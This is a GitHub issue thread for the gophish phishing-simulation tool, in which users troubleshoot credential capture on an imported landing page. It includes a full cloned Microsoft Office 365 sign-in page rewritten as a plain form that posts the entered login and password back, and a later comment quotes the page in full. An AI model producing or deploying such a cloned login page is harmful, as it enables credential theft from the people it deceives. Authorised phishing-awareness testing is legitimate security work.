### ISSUE TITLE
Landing page redirect not working

### ISSUE THREAD

**Issue by n838901** [gophish/gophish#622]
I imported a landing page with a form, and set a redirect URL.  When testing the campaign, I click the button in the form but nothing happens.

**Comment by jordan-wright** [comment]
This is likely due to JavaScript on the page preventing the form submission. This happens on some pages and requires manual changes to make work. There are other issues with similar symptoms you can look to for help (I'm on mobile or I'd help find them.)

**Comment by jbilliau** [comment]
seems like that is my last issue.  I have a office 365 login page.  I get my landing page...but when I put in credentials and click login, nothing happens.  Doesnt track that part either...so I see the user clicked the link in my campaign, but dont see anything beyond that

**Comment by S0larflare** [comment]
Have a look at the source, and for each field in the form that you want to capture (probably user/email and password) add a 'name' value if there isn't one. Then try again. GoPhish seems to like them having a name

Sent from my iPhone

On 19 May 2017, at 16:39, jbilliau <notifications@github.com<mailto:notifications@github.com>> wrote:


seems like that is my last issue. I have a office 365 login page. I get my landing page...but when I put in credentials and click login, nothing happens. Doesnt track that part either...so I see the user clicked the link in my campaign, but dont see anything beyond that

**Comment by jbilliau** [comment]
I viewed the source and it already has this:

<input id="cred_userid_inputtext" class="login_textfield textfield required email field normaltext" placeholder="someone@example.com " type="email" name="login" spellcheck="false" alt="someone@example.com " aria-label="User account" value="" autocomplete="off" aria-describedby="accessibleError"/>


Is that what you mean?    name="login" ?

**Comment by S0larflare** [comment]
Yes, that's what I meant. If that's not the issue the most likely culprit is the submit function being an obscure one using JavaScript or something. You're probably best simplifying it to just be a normal html form that uses the css.

Sent from my iPhone

On 19 May 2017, at 16:44, jbilliau <notifications@github.com<mailto:notifications@github.com>> wrote:


I viewed the source and it already has this:

Is that what you mean? name="login" ?

**Comment by jbilliau** [comment]
dang, so many variables and instances of things not working depending on the site u are pulling from.  What a pain in the butt.  Seems like no good easy way to setup phishing, lol.   Unless I do something more simple...

**Comment by jbilliau** [comment]
I got it finally to work. Last questoin. it captures cedentials according to the logs here...but under view details.. parameter and  value are blank.  Should it have logged the credentials and displayed them here? under this section?
![screen3](https://cloud.githubusercontent.com/assets/28764809/26257149/874289e0-3c8d-11e7-881e-1cfaab4becf4.jpg)

**Comment by jbilliau** [comment]
made more headway for others!

the form must have name identified in the two input methods.  Thats how it works.

`                                   <input type="text" tabindex="1" name="login" class="login_textfield textfield required email field normaltext" placeholder="someone@example.com "/>
                <input type="password" aria-label="Password" name="password" placeholder="Password" class="login_textfield textfield required field normaltext" tabindex="2"/>`

Notice in my code here I added  name="login and name="password"

This allows the credentials to be posted back to gophish.


![submit](https://cloud.githubusercontent.com/assets/28764809/26265868/dfc6b33e-3cb0-11e7-9f71-fa98b7af5a2b.jpg)


Hope others find this helpful!!

**Comment by jordan-wright** [comment]
It looks like there's been good discussion and the root cause to the original issue has been identified from what I can tell. @n838901 let us know if you continue to run into issues and we can re open.

**Comment by petegriggs** [comment]
@jbilliau Can you share how you did this. Was this the existing form or was it a third party created one?

**Comment by jbilliau** [comment]
I can't remember. I'd have to look as I dont have this server fired up at the moment.  If you are still interested, I can look.  Sorry I was on vacation for a few days.

**Comment by petegriggs** [comment]
No worries. I ended up coding my own page hahaha! If you do find it and I can scrape the real page that would be easier and preferable.

**Comment by jbilliau** [comment]
Here is my landing page

`<html><head>
    <title>Sign in to Microsoft Online Services</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Expires" content="-1"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="PageID" content="i5030.2.0"/>
    <meta name="SiteID" content="10"/>
    <meta name="ReqLC" content="1033"/>
    <meta name="LocLC" content="1033"/>
    <meta name="mswebdialog-newwindowurl" content="*"/>
    <link rel="SHORTCUT ICON" href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/images/favicon_a.ico"/>
    <link href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/css/login.ltr.css" rel="stylesheet" type="text/css"/>
    <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.1.5.1.min.js" type="text/javascript"></script>
    <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/aad.login.js" type="text/javascript"></script>
    <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.easing.1.3.js" type="text/javascript"></script>
    <style>
        body {
            display: none;
        }
    </style>
</head>



<body>
    <script>
        if (self == top) {
            var body = $('body');
            body.css('display', 'block');
        } else {
            top.location = self.location;
        }
    </script>
    <div id="background_branding_container" class="ie_legacy" style="background: #FFFFFF">
        <img id="background_background_image" alt="Illustration for Microsoft Online Services"/>
        <div id="background_company_name_text" class="background_title_text"></div>
    </div>
    <div id="background_page_overlay" class="overlay ie_legacy">
    </div>
    <div id="login_no_script_panel" class="login_panel">
        <table class="login_panel_layout" style="height: 100%;">
            <tbody><tr class="login_panel_layout_row" style="height: 100%;">
                <td id="login_panel_left"></td>
                <td id="login_panel_center">

                </td>
                <td id="login_panel_right">
                </td>
            </tr>
        </tbody></table>
        
        
    </div>
    <div id="login_panel" class="login_panel">
        <table class="login_panel_layout" style="height: 100%;">
            <tbody><tr class="login_panel_layout_row" style="height: 100%;">
                <td id="login_panel_left"></td>
                <td id="login_panel_center">


                    
                    <script type="text/javascript">
                        $(document).ready(function() {


                            Constants.DEFAULT_LOGO = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/logo.png';
                            Constants.DEFAULT_LOGO_ALT = 'Sign in';
                            Constants.DEFAULT_ILLUSTRATION = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/illustration.jpg';
                            Constants.DEFAULT_BACKGROUND_COLOR = '#EB3C00';

                            Context.TenantBranding.workload_branding_enabled = true;
                            User.UpdateLogo(Constants.DEFAULT_LOGO, Constants.DEFAULT_LOGO_ALT);
                            User.UpdateBackground(Constants.DEFAULT_ILLUSTRATION, Constants.DEFAULT_BACKGROUND_COLOR);
                            Context.TenantBranding.whr_key = '';
                            jQuery('img#logo_img').attr('src', '');
                            Context.use_instrumentation = true;
                            User.moveFooterToBottom('250px');
                        });
                    </script>

                    <div class="login_inner_container">
                        <div class="inner_container cred">
                            <div class="login_workload_logo_container">
                            </div>
                            <div class="login_cta_container normaltext">
                                <div id="login_cta_text" class="cta_message_text 1">Sign in with your organizational account</div>
                            </div>
                            <ul class="login_cred_container">
                                <li class="login_cred_field_container">
                                    <div id="cred_userid_container" class="login_textfield textfield">
                                        <span class="input_field textfield">
                 <label for="UsernameForm" class="no_display">User account</label>
                  <div class="input_border">
                
                                        <form method="POST" action="" name="LoginForm" autocomplete="off">
                                            <br/>
                                   <input type="text" tabindex="1" name="login" class="login_textfield textfield required email field normaltext" placeholder="someone@example.com "/>
                                            <br/>
                                            <br/>
                <input type="password" aria-label="Password" name="password" placeholder="Password" class="login_textfield textfield required field normaltext" tabindex="2"/>
                                            <br/>
                                            <br/>
                                            <br/>
                                            <input type="submit" class="button normaltext cred_sign_in_button refresh_domain_state" value="Sign In"/>
                                        </form>
                                    </div>
                                    <div id="cred_password_container" class="login_textfield textfield">
                                        <span class="input_field textfield">
                  <label for="PasswordForm" class="no_display">Password</label>
                  <div class="input_border">
                  </div>
                </span>
                                    </div>
                                    <div id="cred_hidden_inputs_container" class="no_display">
                                        <input type="hidden" id="PPSX" name="PPSX" value="PassportRN"/>
                                        <input type="hidden" name="PPFT" id="i0327" value="A1F6YNWGa2YkRUNNhPfW3T8PcqsjHEeiQmp*m*wFwPyxag08*cPrW*SpZSnKeqiDJI*EUu8ceb42zjM89!r*ck!Q6kkHvZYoRPC53LwqFG6O6YCE5yI3mHRGLjK6BurKT332TUIqbZPBSJiw!cfoJN2PCje1NESa7hs4mIzcHNmkN7DO0RJOeoWX8r1DK*UBFpxFwOw$"/>
                                    </div>
                                    
                                </span></div></li>
                                <li class="login_cred_options_container">
                                    <div id="cred_kmsi_container" class="subtext normaltext">
                                        <span class="input_field ">
                <input tabindex="10" id="cred_keep_me_signed_in_checkbox" type="checkbox" value="0" name="persist"/>
                <label id="keep_me_signed_in_label_text" for="cred_keep_me_signed_in_checkbox" class="persist_text">Keep me signed in</label>
              </span>
                                    </div>
                                </li>
                            </ul>
                        </div>
                    </div>
                </td>
            </tr>
        </tbody></table>
    </div>


</body></html>`

**Comment by MccoyTesting** [comment]
> Here is my landing page
> 
> ```
> <html><head>
>     <title>Sign in to Microsoft Online Services</title>
>     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
>     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes"/>
>     <meta http-equiv="Pragma" content="no-cache"/>
>     <meta http-equiv="Expires" content="-1"/>
>     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
>     <meta name="PageID" content="i5030.2.0"/>
>     <meta name="SiteID" content="10"/>
>     <meta name="ReqLC" content="1033"/>
>     <meta name="LocLC" content="1033"/>
>     <meta name="mswebdialog-newwindowurl" content="*"/>
>     <link rel="SHORTCUT ICON" href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/images/favicon_a.ico"/>
>     <link href="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/css/login.ltr.css" rel="stylesheet" type="text/css"/>
>     <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.1.5.1.min.js" type="text/javascript"></script>
>     <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/aad.login.js" type="text/javascript"></script>
>     <script src="https://secure.aadcdn.microsoftonline-p.com/aad/20.200.19625/js/jquery.easing.1.3.js" type="text/javascript"></script>
>     <style>
>         body {
>             display: none;
>         }
>     </style>
> </head>
> 
> 
> 
> <body>
>     <script>
>         if (self == top) {
>             var body = $('body');
>             body.css('display', 'block');
>         } else {
>             top.location = self.location;
>         }
>     </script>
>     <div id="background_branding_container" class="ie_legacy" style="background: #FFFFFF">
>         <img id="background_background_image" alt="Illustration for Microsoft Online Services"/>
>         <div id="background_company_name_text" class="background_title_text"></div>
>     </div>
>     <div id="background_page_overlay" class="overlay ie_legacy">
>     </div>
>     <div id="login_no_script_panel" class="login_panel">
>         <table class="login_panel_layout" style="height: 100%;">
>             <tbody><tr class="login_panel_layout_row" style="height: 100%;">
>                 <td id="login_panel_left"></td>
>                 <td id="login_panel_center">
> 
>                 </td>
>                 <td id="login_panel_right">
>                 </td>
>             </tr>
>         </tbody></table>
>         
>         
>     </div>
>     <div id="login_panel" class="login_panel">
>         <table class="login_panel_layout" style="height: 100%;">
>             <tbody><tr class="login_panel_layout_row" style="height: 100%;">
>                 <td id="login_panel_left"></td>
>                 <td id="login_panel_center">
> 
> 
>                     
>                     <script type="text/javascript">
>                         $(document).ready(function() {
> 
> 
>                             Constants.DEFAULT_LOGO = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/logo.png';
>                             Constants.DEFAULT_LOGO_ALT = 'Sign in';
>                             Constants.DEFAULT_ILLUSTRATION = 'https://secure.aadcdn.microsoftonline-p.com/aadbranding/1.0.1/aadlogin/Office365/illustration.jpg';
>                             Constants.DEFAULT_BACKGROUND_COLOR = '#EB3C00';
> 
>                             Context.TenantBranding.workload_branding_enabled = true;
>                             User.UpdateLogo(Constants.DEFAULT_LOGO, Constants.DEFAULT_LOGO_ALT);
>                             User.UpdateBackground(Constants.DEFAULT_ILLUSTRATION, Constants.DEFAULT_BACKGROUND_COLOR);
>                             Context.TenantBranding.whr_key = '';
>                             jQuery('img#logo_img').attr('src', '');
>                             Context.use_instrumentation = true;
>                             User.moveFooterToBottom('250px');
>                         });
>                     </script>
> 
>                     <div class="login_inner_container">
>                         <div class="inner_container cred">
>                             <div class="login_workload_logo_container">
>                             </div>
>                             <div class="login_cta_container normaltext">
>                                 <div id="login_cta_text" class="cta_message_text 1">Sign in with your organizational account</div>
>                             </div>
>                             <ul class="login_cred_container">
>                                 <li class="login_cred_field_container">
>                                     <div id="cred_userid_container" class="login_textfield textfield">
>                                         <span class="input_field textfield">
>                  <label for="UsernameForm" class="no_display">User account</label>
>                   <div class="input_border">
>                 
>                                         <form method="POST" action="" name="LoginForm" autocomplete="off">
>                                             <br/>
>                                    <input type="text" tabindex="1" name="login" class="login_textfield textfield required email field normaltext" placeholder="someone@example.com "/>
>                                             <br/>
>                                             <br/>
>                 <input type="password" aria-label="Password" name="password" placeholder="Password" class="login_textfield textfield required field normaltext" tabindex="2"/>
>                                             <br/>
>                                             <br/>
>                                             <br/>
>                                             <input type="submit" class="button normaltext cred_sign_in_button refresh_domain_state" value="Sign In"/>
>                                         </form>
>                                     </div>
>                                     <div id="cred_password_container" class="login_textfield textfield">
>                                         <span class="input_field textfield">
>                   <label for="PasswordForm" class="no_display">Password</label>
>                   <div class="input_border">
>                   </div>
>                 </span>
>                                     </div>
>                                     <div id="cred_hidden_inputs_container" class="no_display">
>                                         <input type="hidden" id="PPSX" name="PPSX" value="PassportRN"/>
>                                         <input type="hidden" name="PPFT" id="i0327" value="A1F6YNWGa2YkRUNNhPfW3T8PcqsjHEeiQmp*m*wFwPyxag08*cPrW*SpZSnKeqiDJI*EUu8ceb42zjM89!r*ck!Q6kkHvZYoRPC53LwqFG6O6YCE5yI3mHRGLjK6BurKT332TUIqbZPBSJiw!cfoJN2PCje1NESa7hs4mIzcHNmkN7DO0RJOeoWX8r1DK*UBFpxFwOw$"/>
>                                     </div>
>                                     
>                                 </span></div></li>
>                                 <li class="login_cred_options_container">
>                                     <div id="cred_kmsi_container" class="subtext normaltext">
>                                         <span class="input_field ">
>                 <input tabindex="10" id="cred_keep_me_signed_in_checkbox" type="checkbox" value="0" name="persist"/>
>                 <label id="keep_me_signed_in_label_text" for="cred_keep_me_signed_in_checkbox" class="persist_text">Keep me signed in</label>
>               </span>
>                                     </div>
>                                 </li>
>                             </ul>
>                         </div>
>                     </div>
>                 </td>
>             </tr>
>         </tbody></table>
>     </div>
> 
> 
> </body></html>
> ```
Chief can you repaste this please.... It's no longer showing up on the landing page, only blue blank page...
